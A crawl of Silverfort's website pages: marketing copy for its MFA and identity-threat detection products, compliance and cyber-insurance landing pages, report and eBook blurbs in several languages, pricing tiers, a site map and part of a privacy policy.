2024-02-05 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-hr-systems/ Protect all your sensitive HR data with Silverfort’s MFA solution. Silverfort’s Multi-Factor Authentication (MFA) solution revolutionizes HR system security by adding a robust layer of protection that goes beyond traditional passwords. By requiring additional verification methods, such as biometrics or one-time passcodes, it ensures that sensitive employee data remains secure against unauthorized access. Its ability to enforce adaptive authentication policies means that security measures are intelligently tailored to the risk level of each access attempt, providing a seamless balance between security and user convenience. With comprehensive coverage, Silverfort extends its protective shield across all access points, including legacy and cloud-based systems, without the need for direct integration. This not only safeguards every entry to your HR information but also aids in compliance with regulatory mandates, ensuring your organization meets legal standards for data protection effortlessly. Designed for ease of use and seamless integration, Silverfort enables organizations to strengthen their security posture without disrupting HR operations or user experience. Its innovative approach to anomaly detection and response further ensures that any suspicious activity is swiftly identified and mitigated, keeping your HR systems safe and your employee data protected. Choose Silverfort’s MFA for a future where HR data security is uncompromised and user-friendly. --- - Published: 2024-01-17 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-security-insurance-requirements-secweek-jan24/ What to Know & How to Comply Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. In this eBook, we’ll help you make sense of what you’ll need. Explore this eBook to discover: What types of MFA are required for cyber liability insurance How to evaluate cyber security insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network And more --- - Published: 2024-01-10 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-security-insurance-requirements-thn-email-jan-24/ Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. In this eBook, we’ll help you make sense of what you’ll need. Explore this eBook to discover: What types of MFA are required for cyber liability insurance How to evaluate cyber security insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network And more --- - Published: 2023-12-13 - Modified: 2025-07-21 - URL: https://www.silverfort.com/platform/identity-threat-detection-and-response/ Identity threat detection & response (itdr) Detect and respond to identity threats. Anytime, anywhere. Make every second count. Detect and block credential access, privilege escalation, and lateral movement attempts, whether on-prem, in the cloud—or both. Get a demo or Take a tour Get ahead of identity threats with high precision detection and in-line protection. Powered by our patented technology, our platform extends seamlessly throughout your entire identity infrastructure. With Silverfort embedded in the flow of all authentication requests, you get multilayered analysis of protocol anomalies, user behavior and malicious access patterns to disclose active attacks with the highest precision. Complete end-to-end coverage Monitor every authentication and access attempt of every human and non-human user in your hybrid environment so you know your entire identity attack surface is covered.   Highest-precision analysis and verification Reduce false positives and unburden your security team with context-driven analysis of every authentication attempt and effective verification of detected threats with MFA. Active real-time response Block malicious access attempts to secure your environment from adversarial activity, while providing your security team with actionable forensic data. Learn more about our platform Unparalleled depth and breadth of detection and protection. Discover Widest range of identity threats coverage. Detect all types of identity threats across the full range of attempted malicious access, from brute force and Kerberoasting to Pass the Ticket and DCsync. Analyze Granular insight into detected malicious activity. Dive into all the critical details of alerted activity and entities, and get vital context for investigation and efficient response. Protect Merge with your security stack. Share risk signals with your SIEM and XDR to enrich context and enhance accuracy, and integrate with SOAR remediation workflows. How Silverfort detects and responds to identity threats—in real time. Take a tour of ITDR Learn more Explore blog --- - Published: 2023-12-11 - Modified: 2025-08-18 - URL: https://www.silverfort.com/use-cases/compliance/ Regulatory compliance Complete protection for built-in compliance. Compliance with regulations and standards is critical to every organization. Meet the identity security requirements of key cybersecurity regulations with Silverfort’s MFA, PAM, and service account protection. Get a demo or Take a tour Your fast track to continuous regulatory compliance. Silverfort simplifies and expedites compliance by unifying the siloes of identity infrastructure. Our platform seamlessly extends security controls across every identity, resource, and environment, so you can check every box. End-to-end protection Our patented technology seamlessly fuses with your entire identity infrastructure, extending MFA access control across all on-prem and cloud resources. Accelerated ROI Our non-intrusive technology allows universal identity security at speed. Fully deploy in your production environment within days or weeks. Compliance assured Check off all key identity security requirements with universal coverage: MFA, service account visibility and protection, and privileged access security. Learn more about our platform Browse the regulations we can help you with NY-DFS Part 500 Address NY-DFS identity protection requirements in a single solution. Read more PCI-DSS 4. 0 Meet the new identity protection requirements listed in PCI-DSS 4. 0. Read more NIS2 Directive Meet NIS2 MFA requirements to with universal coverage. Read more Digital Operational Resilience Act (DORA) Comply with the identity security requirements outlined in DORA. Read more MAS Cybersecurity Align with MAS requirements relating to MFA, privilege access, and NHI. Read more UK Telecoms Security Framework (TSF) Comply with the privilege access protection requirements outlined in the TSF. Read more CCOP for Critical Information Infrastructure 2. 0 Align with the MFA, PAM and domain controller protection requirements of CCOP. Read more UK Cyber Essentials and Cyber Essentials Plus Map and adjust your identity protection measures to these best practices. Read more NIST Cybersecurity Framework 2. 0 Address all relevant aspects of NIST 2. 0 with unified identity protection. Read more Cyber Assessment Framework (CAF) Meet the key identity security requirements outlined by CAF. Read more HIPAA (Health Insurance Portability and Accountability Act) Comply with HIPAA by unifying strong access controls and MFA across all users, NHIs, service accounts and more. Read more Essential Eight Align with the ASCS Essential Eight Maturity Model with Silverfort. Read more SWIFT Customer SecurityControls Framework (CSCF) v2025 Comply with updated Customer Security Controls Framework with Silverfort. Read more Security of Critical National Infrastructure (SOCI) Act Address the identity security aspects of SOCI and reduce your identity attack surface with ease. Read more Learn more about our platform --- - Published: 2023-11-29 - Modified: 2024-09-13 - URL: https://www.silverfort.com/silverfort-for-smb-customers/ Welcome Cyber Insurance Clients! Silverfort stops identity threats such as account takeover, lateral movement and ransomware spread. The key is speed. Deploy quickly and easily in time for your cyber insurance renewal. Qualify for a special cyber insurance bundle partner price by filling out the form below. Check Eligibility Real-Time Protection Against Identity Threats 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn’t be protected before 02 Securing Service Accounts Gain full visibility into your service accounts’ inventory, activity, and behavior, and apply auto-created access polices to alert or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that doesn’t rely on agents or proxies with no code changes required ensure the solution gets fully deployed in mere days Fill in the form below to ensure your broker has access to our exclusive special cyber insurance bundle price. --- - Published: 2023-11-20 - Modified: 2025-05-05 - URL: https://www.silverfort.com/site-map/ Silverfort Site Map CompanyAbout UsNews and PressCareersContact UsInvestorsPlatformThe Silverfort PlatformPricingPartnersMicrosoft Partner PageTechnology PartnersChannel PartnersCyber Insurance PartnersPartners PortalCustomer SuccessSupportSilverfort AcademyDocumentation CenterUse CasesAgentless MFACyber Insurance ComplianceSecuring Service AccountsRansomware ProtectionPrivileged Access ManagementIdentity Zero TrustHybrid IAM ConsolidationLateral Movement PreventionRisk-Based AuthenticationVisibility & Risk AnalysisResourcesBlogCase studies eBooksGlossaryReportsSolution Briefs ToolsVideosWebinarsWhite papers MFA everywhereMFA for Active DirectoryMFA for AWS CLIMFA for AWS WorkspacesMFA for AzureMFA for B2BMFA for BankingMFA for BusinessMFA for Critical AssetsMFA for Cyber InsuranceMFA for DesktopMFA for Domain Admin AccountsMFA for Forticlient VPNMFA for HealthcareMFA for HR SystemsMFA for JenkinsMFA for JiraMFA for JuniperMFA for Legacy ApplicationsMFA for LinuxMFA for Meraki VPNMFA for Network DevicesMFA for Office 365MFA for On-Premise Active DirectoryMFA for On-premises ApplicationsMFA for Palo Alto VPNMFA for PowershellMFA for Privileged AccountsMFA for PsExecMFA for RDPMFA for RDP AzureMFA for RDP OktaMFA for Remote AccessMFA for Remote Desktop GatewayMFA for ServersIdentity Protection for EducationIdentity Protection for HealthcareIdentity Protection for Financial ServicesIdentity Protection for ManufacturingIdentity Protection for Oil & GasIdentity Protection for TelecommunicationsIdentity Protection for Retail MFA for Service AccountsMFA for Shared AccountsMFA for TeamsMFA for User Interface LoginsMFA for vCenterMFA for VDIMFA for VMWareMFA for VPNMFA for Web ApplicationsMFA for WindowsMFA for Windows 10MFA for Windows 11MFA for Windows ServerMFA for Windows Server LoginLegalTerms of Use Privacy Policy Data Privacy Framework --- - Published: 2023-10-30 - Modified: 2024-09-13 - URL: https://www.silverfort.com/silverfort-for-rt-specialty-customers/ Welcome RT Specialty Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. Free Assessment Real-Time Protection Against Identity Threats 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn’t be protected before 02 Securing Service Accounts Gain full visibility into your service accounts’ inventory, activity, and behavior, and apply auto-created access polices to alert or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that doesn’t rely on agents or proxies with no code changes required ensure the solution gets fully deployed in mere days Fill in the form below to gain insight into your environment’s security posture with Silverfort’s free Identity Security Assessment. --- - Published: 2023-10-29 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-insurance-requirements-de/ Der Wert einer Cyberversicherung ist allgemein bekannt. Die wachsenden Anforderungen von Cyberversicherungen zu erfüllen ist herausfordernd. Zunehmende Ransomwareangriffe erfordern MFA auf Ressourcen die nicht von herkömmlichen MFA Architekturen geschützt werden können. Silverfort hilft Ihnen, diese Anforderungen inhaltlich zu beantworten. Dieses eBook erklärt: Welche Arten von MFA sind für die Cyber-Haftpflichtversicherung erforderlich? So bewerten Sie Cyber-Versicherungslösungen So erfüllen Sie die MFA-Versicherungsanforderungen mit minimaler Unterbrechung Ihres Netzwerk Betriebs --- - Published: 2023-10-27 - Modified: 2025-03-26 - URL: https://www.silverfort.com/customer-success/ Customer success and support Committed to helping you. Throughout your journey with us, our expert Customer Success team will be your trusted advisors, so you can get the most out of Silverfort. Browse customer resources or Check out our Success packages Get support now Go to support portal Browse our customer resources. Academy Your guide through every step of your journey with us. Community Access exclusive customer forums, webinars, and product updates. Trust Center Our one-stop third-party diligence and risk management site. Documentation Quick access to all technical documentation. Silverfort Academy Discover Silverfort on your own timeline through our exclusive Academy. Designed to guide you through every step of your journey with us, from onboarding to leveling up your identity protection, you can browse customer workshops, how-to videos, and much more. Included in the Academy is our free-of-charge Silverfort Certification Program, which covers a tailored learning path through self-paced courses, interactive hands-on labs, and dynamic live training sessions conducted by Silverfort experts. Go to Silverfort Academy Silverfort Community Get to know other Silverfort customers by joining our community. The community includes exclusive customer forums, product updates, webinars, and specialty groups, and it's open to ALL Silverfort customers! Join our community Trust center We are committed to absolute transparency in helping our customers assess the risks associated with our company and product. Silverfort Trust Center is the one-stop third-party diligence and risk management site for customers and prospective buyers of Silverfort. This portal includes many key artifacts, including audit reports and certifications along with pre-filled SIG and CAIQ questionnaires for your consumption. Contact our security and risk management team if you have any questions. Learn more Documentation center Access all technical documentation, including release notes, product notes, technical specs and more, through our Documentation Center. All registered Silverfort users can access the center by logging in via the button below. If you are an existing customer and do not have access to the documentation center, please contact cs@silverfort. com or support@silverfort. com for assistance. Go to Documentation Center Your success is our success Our success packages are tailored to meet the complexities of your environment and the business and technical outcomes that matter to you. Scroll sideways Features Standard Premium Diamond* Onboarding Kickoff call Sizing & Architecture Deployment 2 use cases Personalized Personalized Training Silverfort Academy Silverfort Academy Silverfort Academy & Custom Training Business Outcome Alignment Once during onboarding Semi-Annual Quarterly Support Coverage Standard Business Hours (P1 24×7) Standard Business Hours (P1 24×7) Standard Business Hours (P1 24×7) Support Method Email, online Email, phone, online Email, phone, online Priority Case Assignment Support Portal (Knowledge Base, Case Submissions) P1 Response Time 24×7 2hr 2hr 1hr P2 Response Time 10hr 8hr 6hr P3 Response Time 2 days 24hr 12hr P4 Response Time 5 days 3 days 24hr Account Resources Customer Success Services Shared Resource Named Customer Success Manager Named Customer Success Manager Technical Resource Shared Resource Named Customer Solutions Specialist Named Customer Solutions Specialist Engagement with Success Manager Every other week Weekly Account Services Exclusive Enhancements Customized Workshops: policies, service accounts, reporting Annual Health Check Operational & Maintenance Communication Businesss Review Semi-annual Quarterly Product Roadmap Sessions Cohort webinars Yearly Yearly Threat Hunting Add-on Add-on Add-on *Premium & Diamond Services – delivered via Silverfort only --- - Published: 2023-10-26 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-insurance-requirements-fr/ Tout le monde connaît la valeur de la cyber assurance mais la mise en conformité demeure souvent délicate. À mesure que les attaques de rançongiciels augmentent dans le monde entier, il devient de plus en plus difficile d’étendre la couverture MFA à la liste grandissante des ressources d’entreprise exigée par les assureurs. Nous sommes là pour vous aider à comprendre ce dont vous aurez besoin. Cet eBook explique : Quels types de MFA sont requis par les cyberassurances Comment évaluer les différentes solutions pour se mettre en conformité Comment se conformer aux exigences MFA tout en limitant les perturbations dans votre réseau --- - Published: 2023-10-02 - Modified: 2024-11-04 - URL: https://www.silverfort.com/state-of-identity-attack-surface-de/ Die erste umfassende Studie über die Widerstandsfähigkeit von Identitätsbedrohungen: Warum Unternehmen nicht in der Lage sind, sich gegen Account-Takeover, Lateral Movement und Ransomware Angriffe zu schützen. 83% der Unternehmen haben einen Sicherheitsverstoß erlebt, bei dem Zugangsdaten kompromittiert wurden. Nur 5,7% der Unternehmen haben vollen Einblick in ihre Servicekonten. 89,8% der Unternehmen schaffen es nicht, Ihre PAM (Privileged Access Management) Lösung vollständig zu integrieren. Nur 22% der Unternehmen sind in der Lage, den böswilligen Zugriff auf ihren Dienst zu verhindern. --- - Published: 2023-09-20 - Modified: 2024-11-04 - URL: https://www.silverfort.com/state-of-identity-attack-surface-fr/ Etude sur la résilence contre les menaces sur les identités: Pourquoi les entreprises échouent à se protéger contre les compromissions de comptes, mouvements latéraux et attaques ransomwares. 83% d’entre elles ont déjà subi une violation impliquant des identifiants compromis. Seulement 5,7 % des organisations ont une visibilité totale de leurs comptes de service. 89,8 % des entreprises échouent à implémenter complètement leur solution PAMs. Seulement 22% des entreprises sont capables de prévenir des accès malicieux à leur service. --- - Published: 2023-09-06 - Modified: 2024-11-04 - URL: https://www.silverfort.com/state-of-identity-attack-surface-2023/ The first comprehensive study on identity threats resilience: why organizations are unable to protect themselves against account takeovers, lateral movement, and ransomware attacks. 83% of organizations have experienced a security breach involving compromised credentials. Only 5. 7% of organizations have full visibility into their service accounts. 89. 8% of organizations fail to fully onboard their PAM solutions. Only 22% of organizations are able to prevent malicious access to their service accounts. --- - Published: 2023-09-06 - Modified: 2024-11-04 - URL: https://www.silverfort.com/state-of-identity-attack-surface-thn-cont-art/ The first comprehensive study on identity threats resilience: why organizations are unable to protect themselves against account takeovers, lateral movement, and ransomware attacks. 83% of organizations have experienced a security breach involving compromised credentials. Only 5. 7% of organizations have full visibility into their service accounts. 89. 8% of organizations fail to fully onboard their PAM solutions. Only 22% of organizations are able to prevent malicious access to their service accounts. --- - Published: 2023-09-06 - Modified: 2024-11-04 - URL: https://www.silverfort.com/state-of-the-identity-attack-surface/ The first comprehensive study on identity threats resilience: why organizations are unable to protect themselves against account takeovers, lateral movement, and ransomware attacks. 83% of organizations have experienced a security breach involving compromised credentials. Only 5. 7% of organizations have full visibility into their service accounts. 89. 8% of organizations fail to fully onboard their PAM solutions. Only 22% of organizations are able to prevent malicious access to their service accounts. --- - Published: 2023-09-05 - Modified: 2024-11-04 - URL: https://www.silverfort.com/state-of-identity-attack-surface-secweek/ The first comprehensive study on identity threats resilience: why organizations are unable to protect themselves against account takeovers, lateral movement, and ransomware attacks. 83% of organizations have experienced a security breach involving compromised credentials. Only 5. 7% of organizations have full visibility into their service accounts. 89. 8% of organizations fail to fully onboard their PAM solutions. Only 22% of organizations are able to prevent malicious access to their service accounts. --- - Published: 2023-08-31 - Modified: 2025-08-18 - URL: https://www.silverfort.com/pricing/ Silverfort Pricing Our pricing is based on the size of your organization. Choose between four packages depending on where your business is on its identity security journey. All packages include Silverfort’s patented Runtime Access Protection for preemptive security controls and Identity Inventory for end-to-end identity observability across your entire identity fabric. Get a quote today Core Includes: Identity Security Posture Management (ISPM) Map identity attack surface Find & fix security exposures Universal MFA Extend MFA to: IT/OT infrastructure Command-line tools Legacy systems & more Get a quote Plus Everything in Core, and: Service Account Visibility Discover all service accounts Map how & where they are used Service Account Protection Enforce virtual fencing policies Prevent unauthorized access Integrate with other IT tools to manage lifecycle automatically Get a quote Advanced Everything in Plus, and: Authentication Firewall Prevent lateral movement Identity-based segmentation Zero Trust access control Identity Threat Detection & Response (ITDR) Detect identity threats in real time Automated inline response Integrate with XDR and SIEM Get a quote Enterprise Everything in Advanced, and: Access Analysis Enable Least Privilege at scale Understand which users access which resources Privileged Access Security (PAS) Privileged account discovery Virtual fencing & access control Just-In-Time (JIT) access Get a quote Compare our packages SILVERFORT A LA CARTE Build your own package Browse our individual platform capabilities to customize your package. Browse our catalog Compare our pricing packages Scroll sideways Core Plus Advanced Enterprise The Silverfort Platform and standard support services Identity Security Posture Management (ISPM) Uncover, map and analyze identity security exposures Universal Multi-Factor Authentication (MFA) Enable MFA for any resource, including 'unprotectable' systems Service Account Visibility Discover and analyse every service account, even unknowns Service Account Protection Restrict service account access to their intended purpose only Authentication Firewall Boost your resilience with identity-based Zero Trust policies Identity Threat Detection & Response (ITDR) Detect and respond to attacks in real time Access Analysis Understand which users access which resources, at scale Privileged Access Security (PAS) Secure your privileged accounts—in a few clicks Cloud Non-Human Identity (NHI) Security Find, monitor, and secure every cloud-based NHI Implementation & Support Services Standard Included Premier 10% to license cost Diamond 20% to license cost Silverfort Expert Services Identity Security Services (threat hunting & incident response), Silverfort Resident Expert (staff augmentation) and more. Available upon request from Silverfort or selected partners. Get a personalized quote Complete this form and a member of our team will be in touch to discuss --- - Published: 2023-08-15 - Modified: 2025-08-21 - URL: https://www.silverfort.com/privacy-policy/ Last Updated: September 2024 This privacy policy (“Privacy Policy”) governs how we, Silverfort, Inc. and its subsidiaries (“Silverfort” “we”, “our” or “us”) use, collect and store information pertaining to you (“User”, “you”) such as in the following use cases: (i) When you browse or visit our website, https://www. silverfort. com (“Website”)(ii) When you make use of, or interact with, our Website a. When you request a demo / schedule a demo b. When you contact us (e. g. , to request more information, to make an appointment with us) c. When we process your job application d. When you subscribe to email updates e. When you request to become a partner f. When you log into the partner portal g. When you contact us for support purposes (including, when you access the support platform of Silverfort)(iii) When you use Silverfort Authentication platform (“Platform”) a. When you sign up for an account, log in and/or purchase our services b. When you create administrators for your use of the Platform c. When your administrator user create users for your use of the Platform(iv) When you attend a marketing event and/or we exchange business cards and you provide us with your Personal Data(v) When we acquire your Personal Data from third-party sources (such as lead-generation companies) (vi) When we use the Personal Data of our resellers, distributors, agents and/or finders(vii) When you become our customer(viii) When you become our supplier(ix) When you interact with us on our social media profiles (e. g. , Facebook, Instagram, Twitter, LinkedIn) The Website and the App are individually and collectively referred to herein as the “Services”. We greatly respect your privacy, which is why we make every effort to provide a platform that would live up to the highest of user privacy standards. Please read this Privacy Policy carefully, so you can fully understand our practices in relation to Personal Data. “Personal Data” or “Personal Information” means any information that can be used, alone or together with other data, to uniquely identify any living human being. Please note that this is a master privacy policy and some of its provisions only apply to individuals in certain jurisdictions. For example, the legal basis in the table below is only relevant for GDPR-protected individuals. Important note: Nothing in this Privacy Policy is intended to limit in any way your statutory right, including your rights to a remedy or means of enforcement. Table of contents: What information we collect, why we collect it, and how it is used How we protect and store your Personal Data How we share your Personal Data Additional information regarding transfers of Personal Data Your privacy rights. how to delete your account Use by children Links to and interaction with third party product Log files Analytic tools California Privacy Rights Our California do not track notice Deletion of content from California residents How to contact us This Privacy Policy can be updated from time to time and therefore we ask you to check back periodically for the latest version of the Privacy Policy, as indicated below. If there will be any significant changes made to the use of your Personal Data in a manner different from that stated at the time of collection, we will notify you by posting a notice on our Website or by other means. WHAT INFORMATION WE COLLECT, WHY WE COLLECT IT, AND HOW IT IS USED Personal Data we collectWhy is the Personal Data collected and for what purposes? Legal basis (GDPR only, ifapplicable)Third parties with whomwe share your PersonalDataConsequences of not providing the Personal DataWhen you browse or visit our websiteCookies, analytic tools and log files. For more information, please see ourcookie policyhttps://www. silverfort. com/company/cookies-policy/)Marketing, analytics, analysis,market research, to improve ourwebsiteConsent Legitimate interest (e. g. ,essential cookies)For more information,please see our cookiepolicyhttps://www. silverfort. com/company/cookies-policy/)Cannot collect and store the information;Cannot use or access some parts of the websiteWhen you make use of, or interact with our WebsiteWhen you request a demo/ schedule a demo• Full name• Email Address• Job title• Company name• Phone number• Country & State• Message• Any other information that youdecide to provide/supply us• To schedule a demo• To send you more information about SilverfortPerformance of a contract to which the data subject is party or in order to take steps at the request of the data subject prior to entering into a contractLegitimate interest (e. g. to provide a demo)3rd party platforms, such as for the following purposes:• Salesforce. com (CRM)• HubSpot (marketing communications)• Microsoft O365 (email service)• Salesloft (customer engagement tool)• AWS Redshift (analytic insights)Cannot send you more information about SilverfortCannot schedule a demoCannot respond your query• Full name• Email Address• To send marketing communications. Consent 3rd party platforms, such as for the following purposes:• Salesforce. com (CRM)• HubSpot (marketing communications)• Microsoft O365 (email service) Cannot send you marketing communications When you contact us (e. g. , to request more information, to make an appointment with us) • Full name• Email Address• Job title• Company name• Phone number• Country & State• Information regarding how we can help you• Message• Any other information that you decide to provide/supply usTo process and answer questionsTo provide support (e. g. , to solve problems, bugs or issues)To customize your experiencePerformance of a contract to which the data subject is party or in order to take steps at the request of the data subject prior to entering into a contract Legitimate interest (e. g. to respond to your request) 3rd party platforms, such as for the following purposes:• Salesforce. com (CRM)• HubSpot (marketing communications)• Microsoft O365 (email service)• Salesloft (customer engagement tool) Cannot assist you and respond your queryCannot provide supportCannot customize your experience • Full name• Email AddressTo send marketing communications. Consent 3rd party platforms, such as for the following purposes:• Salesforce. com (CRM)• HubSpot (marketing communications)• Microsoft O365 (email service)Cannot send marketing communications When we have audio calls Call recordingsInternal call analytics and internal educational purposesDepending on the context, consent or legitimate interest3rd party platform - Gong (Customer call recordings and analytics)Cannot perform internal call analytics and limited internal education When we process your job application • Full name• Email Address• Phone number• Resume/CV• LinkedIn profile• Any other information that you decide to provide/supply us• To process your job application• To assess the candidateNote: For the avoidance of doubt, this use case shall apply to the CVs submitted by the Website or by any other methods (e. g. , HR and recruitment agencies ) Performance of a contract to which the data subject is party or in order to take steps at the request of the data subject prior to entering into a contract Legitimate interest (e. g. to assess a candidate) 3rd party platforms, such as for the following purposes:• Comeet (job applicant tracking system)• Box. com (storage)• Microsoft O365 (email service) Cannot process your job applicationCannot assess your suitability as a candidate When you subscribe to email updates • Email Address• To send you more information about Silverfort and marketing communications ConsentLegitimate interest (e. g. to send you marketing communications about Silverfort) 3rd party platforms, such as for the following purposes:• Salesforce. com (CRM)• HubSpot (marketing communications)• Microsoft O365 (email service) Cannot send you marketing communications When you request to become a partner • Full name• Job title• Company name• Email Address• Phone number• Country• Message• Any other information that you choose to share with us• To assess you as a partner• To analyze your profile• To contact you with information about becoming a Silverfort partner Performance of a contract to which the data subject is party or in order to take steps at the request of the data subject prior to entering into a contract Legitimate interest (e. g. to assess a partner) 3rd party platforms, such as for the following purposes:• Salesforce. com (CRM)• HubSpot (marketing communications)• Microsoft O365 (email service)• Salesloft (customer engagement tool)• Docusign (digital signing tool) Cannot asses you as a partner Cannot analyze your profileCannot send you more information about becoming a partner When you log into the partner portal • User• Password• To log in into the partner’s portal• To access partner knowledge base• To register deals with Silverfort Processing is necessary for the performance of a contract to which the data subject is party or in order to take steps at the request of the data subject prior to entering into a contract. Legitimate interest (e. g. to log in into the portal). 3rd party platforms, such as for the following purposes:• Salesforce. com (CRM)• ZenDesk (technical support and knowledge base)• Salesloft (customer engagement tool) Cannot log in into the portal When you contact us for support purposes (including, when you access the support platform of Silverfort) • Full name• Email Address• Company name• Phone number• User and Password• Message/support problem• Any other information that you choose to share with us• To access the support platform• To open support tickets• To access knowledge base and documentation Processing is necessary for the performance of a contract to which the data subject is party or in order to take steps at the request of the data subject prior to entering into a contract. Legitimate interest (e. g. to log in into the portal) 3rd party platforms, such as for the following purposes:• ZenDesk (technical support and knowledge base)• When you call to the support center, we use Voicenation (call center services for support)• Slack (internal communications)• Everafter AI Ltd. Cannot access the support platformCannot open support ticketsCannot access knowledge base and documentation When you use Silverfort Platform When you sign up for an account, log in and/or purchase our services • Full name• Business Email Address• Password• Usage pattern (logs from the use of the Platform)• IP address• Any other information that the user may keep as part of the login process, to the extent that it includes Personal Data. • To provide access to our Platform • To create an account• To make the Platform features available to you• To fulfill your requests for products and/or services and for related activities (e. g. , product and service, account management, support and to provide other services related to your relationship with)• To perform/execute the agreement• To grant you access to the services (our Platform)• To improve and customize user experience Performance of a contract to which the data subject is party. Legitimate interest (e. g. to provide you with Silverfort's services). 3rd party platforms, such as for the following purposes:• Google Firebase (for mobile app operation)• Microsoft Azure (cloud)• Docusign (digital signing tool)• Skytap (demo test environment)• Snowflake, Inc. Cannot provide access to our Platform Cannot create an account Cannot make the Platform features available to you Cannot fulfill your requests for products and/or services and for related activities (e. g. , product and service, account management, support and to provide other services related to your relationship with) Cannot perform/execute the agreement Cannot grant you access to the services (our Platform) Cannot improve and customize user experience When you create administrators for your use of the Platform•Full name•Business email address•Password•Usage pattern (logs from the use of the Platform)•IP address•Any other information that theuser may keep as part of the log-in process, to the extent that it includes Personal Data•To create administrator users for your use of the Platform• To perform/execute the agreement• To grant you and your admin users access to the services (our Platform)• To manage your everyday business needs (e. g. , administration)Performance of a contract to which the data subject is party. Legitimate interest (e. g. to provide you with Silverfort's services). 3rd party platforms, such as for the following purposes:• Google Firebase (for mobile app operation)• Microsoft Azure (cloud)Cannot create administrator users for your use of the PlatformCannot perform/execute the agreementCannot grant you and your admin users access to the services (our Platform)Cannot manage your everyday business needs (e. g. , administration)When your administrator user create users for your use of the Platform• Full name• Business email address• Password• Usage pattern (logs from the use of the... --- - Published: 2023-08-10 - Modified: 2024-09-13 - URL: https://www.silverfort.com/silverfort-for-woodruff-sawyer-customers/ Welcome Woodruff Sawyer Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. Free Assessment Real-Time Protection Against Identity Threats 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn’t be protected before 02 Securing Service Accounts Gain full visibility into your service accounts’ inventory, activity, and behavior, and apply auto-created access polices to alert or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that doesn’t rely on agents or proxies with no code changes required ensure the solution gets fully deployed in mere days Gain insight into your environment’s security posture with Silverfort’s free Identity Security Assessment. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-active-directory/ Complete MFA protection for all Active Directory environments, eliminating the risk of compromised credentials and introducing identity protection and MFA for on-prem environments. Utilizing agentless and proxyless technology, Silverfort analyzes every Active Directory authentication request and if there is a need, pushes MFA notification to the requesting user. Only after successful verification does Silverfort instruct Active Directory to let the user access the requested resource. This process is completely agnostic to the access method – Silverfort makes MFA for Active Directory accessible, comprehensive and easy to deploy, making your organization resilient to cyberattacks as never before. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-on-premise-active-directory/ Strengthen Your On-Premise AD with Stronger MFA Security—Powered by Silverfort. Silverfort is the ideal solution for MFA for On-Premise Active Directory. With its innovative platform, Silverfort removes the need for user interaction during the authentication process, providing complete protection against account takeover and unauthorized access. The AI-driven solution seamlessly integrates with your existing security infrastructure, so that you can easily implement On-prem MFA for Active Directory without any disruption. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-service-accounts/ Unleash the Power of Multi-Factor Authentication for Every Service Account with Silverfort. Silverfort agentless MFA platform provides adaptive authentication and visibility into sensitive company systems and resources. It protects data from unauthorized access with multi-factor authentication (MFA) and eliminates the risk of service account compromise. As the first in the market with an agentless solution for MFA for service accounts, Silverfort is the perfect choice for organizations looking for an easy-to-use and secure way to manage their sensitive systems. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-windows/ Secure windows access with Silverfort’s hassle-free MFA solution. Silverfort is the ideal solution for ensuring secure and hassle-free access to Windows applications. Our cutting-edge MFA technology allows you to effortlessly enable MFA for Windows, eliminating the risk of cyber attacks such as brute force and password guessing. With Silverfort, your organization can implement MFA across all Windows applications, while still maintaining optimal user experience and productivity. Our innovative solution integrates seamlessly with your existing infrastructure, providing unparalleled protection and reliability. Partner with Silverfort today and experience the future of MFA for Windows! --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-windows-10/ Experience effortless MFA protection for your Windows 10 devices with Silverfort. Silverfort is a leading provider of Multi-Factor Authentication (MFA) solutions that protect organizations from modern security threats. Our advanced technology offers comprehensive MFA for Windows 10 that is easy to deploy across all systems and applications. With Silverfort, you can enjoy the benefits of MFA without the hassle of user interruption, password weaknesses or token abuse. Our adaptive risk-based MFA provides users with a seamless experience, while securely securing their sensitive data and confidential information. Try Silverfort today for a next-generation MFA experience that’s guaranteed to keep you safe. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-windows-11/ Secure your Windows 11 journey with effortless MFA – powered by Silverfort. Silverfort is the ultimate solution for multi-factor authentication for Windows 11. It eliminates the vulnerabilities of traditional MFA and ensures that only authorized users can access critical resources. Silverfort’s unique platform uses adaptive risk analysis and AI-powered authentication to provide seamless access controls across hybrid and highly distributed environments. With Silverfort, enterprises can achieve complete visibility and control over access management while boosting security, compliance, and user experience. Sign up today and experience the Silverfort difference. --- - 